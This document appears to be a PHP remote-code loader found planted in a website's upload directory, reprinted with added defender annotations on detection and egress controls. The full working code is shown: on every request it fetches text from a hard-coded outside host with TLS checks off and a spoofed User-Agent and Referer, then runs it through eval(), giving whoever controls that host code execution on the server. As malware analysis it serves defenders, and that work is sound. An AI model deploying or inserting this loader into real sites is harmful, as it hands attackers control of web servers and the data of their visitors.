| Current Path : /home/zqegovsj/public_html/us3.supplierlist.com/upload/beirinmode/ |
| Current File : /home/zqegovsj/public_html/us3.supplierlist.com/upload/beirinmode/index.php |
<?php
// Tanda Build: 4AC9441A037D
/**
 * ANALYSIS (defender notes): remote-code loader.
 *
 * Nothing in this class is application logic. On each run it downloads text
 * from a hard-coded remote URL and executes that text as PHP inside the web
 * server process. The code that actually runs is therefore chosen by whoever
 * controls the remote URL at request time and is never stored in this file.
 *
 * The page header places this file under an upload/ directory. Denying PHP
 * execution in upload directories and restricting outbound connections from
 * the web server are the controls that stop this pattern.
 */
class ABCdeffA {
// ANALYSIS: hard-coded fetch location (named "c2_url" by the author). This is
// the network indicator for this sample: look for outbound HTTPS requests to
// this host from the web server / PHP worker in proxy, DNS and firewall logs.
private static $c2_url = 'https://cw.acidpoll.top/jc/9505-cw-ak-fgsa3658.txt';
/**
 * Entry point: fetch the remote text and, if anything came back, execute it.
 *
 * @return bool false when fetchPayload() returned an empty/false value,
 *              true after runPayload() has been called.
 */
public static function GhJJTY() {
// Download backdoor with proper headers
$payload = self::fetchPayload();
if (empty($payload)) {
return false;
}
self::runPayload($payload);
return true;
}
/**
 * Downloads the body at self::$c2_url with cURL.
 *
 * The request copies the current visitor's User-Agent and sends the URL of
 * the page being served on this host as the Referer.
 *
 * @return string|false response body when the final HTTP status is 200 and
 *                      the body is non-empty; false otherwise.
 */
private static function fetchPayload() {
$ch = curl_init(self::$c2_url);
// IMPORTANT: Mimic infected server request
// ANALYSIS: User-Agent is taken from the incoming request (fallback
// 'Mozilla/5.0'), so the outbound fetch has no fixed User-Agent to match on.
curl_setopt($ch, CURLOPT_USERAGENT, $_SERVER['HTTP_USER_AGENT'] ?? 'Mozilla/5.0');
// ANALYSIS: Referer is rebuilt from this request's scheme, Host header and
// request URI, i.e. the remote server is told which site and path made the
// call. NOTE(review): presumably used by the remote side to identify or
// filter callers - not verifiable from this file.
$scheme = (!empty($_SERVER['HTTPS']) && $_SERVER['HTTPS'] !== 'off') ? 'https://' : 'http://';
$referer = $scheme . ($_SERVER['HTTP_HOST'] ?? 'localhost') . ($_SERVER['REQUEST_URI'] ?? '/');
curl_setopt($ch, CURLOPT_REFERER, $referer);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
// ANALYSIS: 10-second cap; a slow or blocked fetch delays the page by up to
// that long, which can show up as a latency anomaly on the affected path.
curl_setopt($ch, CURLOPT_TIMEOUT, 10);
// ANALYSIS: TLS peer certificate verification is switched off, so the
// download is accepted from any endpoint that answers for the host name.
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
// ANALYSIS: redirects are followed, so the content may be served from a
// different host than the one in $c2_url; check logs for follow-on requests.
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
$response = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
curl_close($ch);
if ($http_code == 200 && !empty($response)) {
return $response;
}
return false;
}
/**
 * Executes the downloaded text in the current PHP process.
 *
 * @param string $code text returned by fetchPayload()
 */
private static function runPayload($code) {
// METHOD 1: Remove PHP tags and eval (CORRECT WAY)
// ANALYSIS: despite the original comment, no tags are removed. Prepending
// '?>' makes eval() start outside PHP mode, so the downloaded text is parsed
// like a standalone .php file (inline output plus any <?php blocks in it).
// The fetched code runs from memory only; this path writes nothing to disk,
// so the loader file itself is the on-disk artefact to hunt for.
// eval is a language construct and is not blocked by the disable_functions
// ini setting; removing the file and blocking egress are what stop it.
eval('?>' . $code);
// ANALYSIS: the block below is commented out and never runs. It is an
// alternative that would write the download to a .php file in the system
// temp directory, include it, and then delete it.
/*
// METHOD 2: Alternative - Write to temp file
$temp = sys_get_temp_dir() . '/tmp_' . md5(time()) . '.php';
file_put_contents($temp, $code);
include($temp);
@unlink($temp);
*/
}
}
// ANALYSIS: unconditional top-level call - the fetch-and-execute sequence runs
// every time this file is requested or included; the boolean result is ignored.
ABCdeffA::GhJJTY();
?>